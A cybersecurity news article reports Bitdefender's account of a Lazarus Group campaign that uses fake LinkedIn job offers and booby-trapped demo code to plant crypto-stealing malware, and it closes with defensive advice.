Login
iscover
Share this article on:
Powered by
MOMENTUM
MEDIA
Powered by MOMENTUMMEDIA
Hackers linked to the Lazarus Group have been attempting to harvest confidential information from victims via fake LinkedIn job offers.
The North Korean Lazarus Group has been observed using fake job offers on the popular professional network LinkedIn to trick individuals into sharing critical information and downloading malicious software.
The campaign – the group’s latest take on using various fake recruitment techniques – was only discovered when the hackers targeted exactly the wrong person: a researcher with cyber security firm Bitdefender.
The hackers begin by offering a chance to collaborate on a decentralised cryptocurrency exchange project, offering vague promises of remote work, flexibility, and good pay. Curious victims are invited into the recruitment process by sharing a CV or a link to their GitHub repository.
The hackers then share access to what appears to be a demo “minimum viable product” of the project and a document containing questions that can only be answered once the demo has been run. While the code seems to be harmless, once run, it’s capable of downloading the first of many malicious payloads onto a victim’s machine.
The first payload is a cross-platform info stealer that can collect and exfiltrate information on any cryptocurrency wallet installed on the device. Once this process is complete, the malware then runs a Python script that deploys three more malicious components, which together are capable of monitoring the machine for further cryptocurrency activity, searching for and exfiltrating a range of file types, and extracting browser logins and other device information.
More payloads are then delivered via a Tor Proxy server connected to the Lazarus Group’s command and control infrastructure. This includes creating a persistent backdoor for further data collection, another file stealer, a keylogger, and even a highly configurable crypto-miner.
According to Bitdefender, the hackers’ objectives go far beyond simply stealing personal data.
“By compromising people working in sectors such as aviation, defence, and nuclear industries, they aim to exfiltrate classified information, proprietary technologies, and corporate credentials,” Bitdefender said.
“In this case, executing the malware on enterprise devices could grant attackers access to sensitive company data, amplifying the damage.”
Bitdefender recommends being aware of red flags such as vague job descriptions, suspicious code repositories, and poor communication, such as spelling errors and a lack of corporate contact details.
“It is ideal to never execute any foreign source code on enterprise devices, and to use virtual machines, sandboxes or various online platforms when doing so on personal computers,” Bitdefender said.
“Even though this would add some overhead to the process, it would prevent any personal information from being leaked and used with malicious intent in the future.”
David Hollingworth has been writing about technology for over 20 years, and has worked for a range of print and online titles in his career. He is enjoying getting to grips with cyber security, especially when it lets him talk about Lego.
Be the first to hear the latest developments in the cyber industry.
